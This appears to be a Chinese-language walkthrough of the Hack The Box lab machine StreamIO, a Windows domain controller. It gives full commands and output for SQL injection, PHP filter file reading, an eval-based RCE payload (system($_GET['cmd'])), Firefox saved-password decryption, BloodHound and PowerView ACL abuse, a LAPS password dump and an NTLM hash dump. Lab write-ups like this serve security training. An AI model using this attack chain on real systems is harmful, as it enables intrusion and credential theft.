基本信息
端口扫描 windows 域机器:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 $ nmap -sC -sV 10.10.11.158 Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-13 15:35 CST Nmap scan report for 10.10.11.158 Host is up (0.19s latency). Not shown: 987 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-title: IIS Windows Server |_http-server-header: Microsoft-IIS/10.0 | http-methods: |_ Potentially risky methods: TRACE 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-06-13 14:37:27Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name) 443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found | ssl-cert: Subject: commonName=streamIO/countryName=EU | Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb | Not valid before: 2022-02-22T07:03:28 |_Not valid after: 2022-03-24T07:03:28 | tls-alpn: |_ http/1.1 |_http-server-header: Microsoft-HTTPAPI/2.0 |_ssl-date: 2022-06-13T14:38:21+00:00; +7h00m01s from scanner time. 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2022-06-13T14:37:43 |_ start_date: N/A | smb2-security-mode: | 3.1.1: |_ Message signing enabled and required |_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 160.82 seconds
80 直接访问是IIS默认页面:
443 watch.streamIO.htb 证书里可以得到域名,加hosts后访问:
1 10.10.11.158 watch.streamIO.htb
443 streamIO.htb
streamIO.htb sql注入 login存在注入,很费时间,最终得到hash,破解出来密码:
1 2 3 4 sqlmap -r login.txt --force-ssl # 密码包括最后那两个点 yoshihide : 66boysandgirls..
admin admin中本身有几个功能,fuzz参数可以发现debug:
1 2 3 4 5 6 https://streamio.htb/admin/?user= https://streamio.htb/admin/?staff= https://streamio.htb/admin/?movie= https://streamio.htb/admin/?message= SecLists/Fuzzing/fuzz-Bo0oM.txt
debug debug那里可以使用php伪协议:
1 2 3 https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=index.php $connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
master 继续进行fuzz可以发现master.php,发现其中调用eval,根据代码分析构造请求,RCE:
1 2 3 4 5 data://text/plain;base64,c3lzdGVtKCRfR0VUWydjbWQnXSk7 system($_GET['cmd']); POST https://streamio.htb/admin/?debug=master.php&cmd=whoami
master.php 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 <h1>Movie managment</h1> <?php if (!defined('included' )) die ("Only accessable through includes" ); if (isset ($_POST['movie_id' ])){ $query = "delete from movies where id = " .$_POST['movie_id' ]; $res = sqlsrv_query($handle, $query, array (), array ("Scrollable" =>"buffered" )); } $query = "select * from movies order by movie" ; $res = sqlsrv_query($handle, $query, array (), array ("Scrollable" =>"buffered" )); while ($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC)){ ?> <div> <div class="form-control" style="height: 3rem;"> <h4 style="float:left;" ><?php echo $row['movie' ]; ?> </h4> <div style="float:right;padding-right: 25px;" > <form method="POST" action="?movie=" > <input type="hidden" name="movie_id" value="<?php echo $row['id']; ?>" > <input type="submit" class="btn btn-sm btn-primary" value="Delete"> </form> </div> </div> </div> <?php } ?> <br><hr><br> <h1>Staff managment</h1> <?php if (!defined('included' )) die ("Only accessable through includes" ); $query = "select * from users where is_staff = 1 " ; $res = sqlsrv_query($handle, $query, array (), array ("Scrollable" =>"buffered" )); if (isset ($_POST['staff_id' ])){ ?> <div class="alert alert-success"> Message sent to administrator</div> <?php } $query = "select * from users where is_staff = 1" ; $res = sqlsrv_query($handle, $query, array (), array ("Scrollable" =>"buffered" )); while ($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC)){ ?> <div> <div class="form-control" style="height: 3rem;"> <h4 style="float:left;" ><?php echo $row['username' ]; ?> </h4> <div style="float:right;padding-right: 25px;" > <form method="POST" > <input type="hidden" name="staff_id" value="<?php echo $row['id']; ?>" > <input type="submit" class="btn btn-sm btn-primary" value="Delete"> </form> </div> </div> </div> <?php } ?> <br><hr><br> <h1>User managment</h1> <?php if (!defined('included' )) die ("Only accessable through includes" ); if (isset ($_POST['user_id' ])){ $query = "delete from users where is_staff = 0 and id = " .$_POST['user_id' ]; $res = sqlsrv_query($handle, $query, array (), array ("Scrollable" =>"buffered" )); } $query = "select * from users where is_staff = 0" ; $res = sqlsrv_query($handle, $query, array (), array ("Scrollable" =>"buffered" )); while ($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC)){ ?> <div> <div class="form-control" style="height: 3rem;"> <h4 style="float:left;" ><?php echo $row['username' ]; ?> </h4> <div style="float:right;padding-right: 25px;" > <form method="POST" > <input type="hidden" name="user_id" value="<?php echo $row['id']; ?>" > <input type="submit" class="btn btn-sm btn-primary" value="Delete"> </form> </div> </div> </div> <?php } ?> <br><hr><br> <form method="POST" > <input name="include" hidden> </form> <?php if (isset ($_POST['include' ])){ if ($_POST['include' ] !== "index.php" ) eval (file_get_contents($_POST['include' ]));else echo (" ---- ERROR ---- " );} ?>
reverse shell 可以直接msf生成上线命令,方便后续操作:
portfwd 1433 前面已经得到数据库账号密码,转发端口:
1 2 3 portfwd add -l 1433 -p 1433 -r 127.0.0.1 $connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
backup 数据库可以发现streamio_backup,users表中可以获得nikk37用户密码,这是机器上有的账户:
1 2 3 1,nikk37 ,389d14cb8e4e9b94b137deb1caf0612a get_dem_girls2@yahoo.com
得到的hash直接在线解密,得到明文密码:
user flag 得到的账号密码登录,user flag
需要把stream.htb也加到hosts
1 2 3 10.10.11.158 watch.streamIO.htb streamIO.htb stream.htb evil-winrm -i stream.htb -u nikk37 -p "get_dem_girls2@yahoo.com"
提权信息 firefox 机器上装有firefox,提取登录信息进行解密
1 2 3 4 5 6 7 8 9 10 11 12 13 C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\ key4.db logins.json python3 firepwd/firepwd.py decrypting login/password pairs https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r' https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)' https://slack.streamio.htb:b'yoshihide',b'paddpadd@12' https://slack.streamio.htb:b'JDgodd',b'password@12'
bloodhound bloodhound收集信息,发现可以从JDgodd打到Administrator
1 bloodhound-python -u nikk37 -ns 10.10.11.158 -d streamio.htb -c All
提权 core staff 根据bloodhound的信息,JDgodd对core staff有WriteOwner权限,core staff有权限去获取laps密码,所以首先把JDgodd加到core staff组中:
1 2 3 4 5 6 7 upload PowerView.ps1 Import-Module .\PowerView.ps1$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force$Cred = New-Object System.Management.Automation.PSCredential('streamio\JDgodd' , $SecPassword )Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Core Staff" -principalidentity "streamio\JDgodd" Add-DomainGroupMember -identity "Core Staff" -members "streamio\JDgodd" -credential $Cred
laps password 现在可以使用JDgodd去获取laps密码:
1 2 3 4 5 6 7 8 9 10 11 12 sudo apt install lapsdumper lapsdumper -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r' -d streamio.htb DC$ :j50th8dNh2($Ae # 也可以继续使用powershell $ Computers = Get-ADComputer -Credential $Cred -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime $ Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime Name DnsHostName ms-Mcs-AdmPwd ms-Mcs-AdmPwdExpirationTime ---- ----------- ------------- --------------------------- DC DC.streamIO.htb j50th8dNh2($Ae 132997693606874315
root flag 得到的laps密码就是Administrator密码,flag在Martin桌面:
1 evil-winrm -i streamio.htb -u Administrator -p 'j50th8dNh2($Ae'
hash 1 2 3 4 5 6 7 8 9 10 impacket-secretsdump -just-dc-ntlm Administrator@10.10.11.158 Administrator:500:aad3b435b51404eeaad3b435b51404ee:45be1d36942e3eb589e8b0d372198f3d::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5f5142aae3cce656285ce4504605dec1::: JDgodd:1104:aad3b435b51404eeaad3b435b51404ee:8846130392c4169cb552fe5b73b046af::: Martin:1105:aad3b435b51404eeaad3b435b51404ee:a9347432fb0034dd1814ca794793d377::: nikk37:1106:aad3b435b51404eeaad3b435b51404ee:17a54d09dd09920420a6cb9b78534764::: yoshihide:1107:aad3b435b51404eeaad3b435b51404ee:6d21f46be3697ba16b6edef7b3399bf4::: DC$ :1000:aad3b435b51404eeaad3b435b51404ee:fac45a493cb064a17fabefae8d723613:::
参考资料
最終更新:2022-09-19 08:53:20
水平不济整日被虐这也不会那也得学,脑子太蠢天天垫底这看不懂那学不会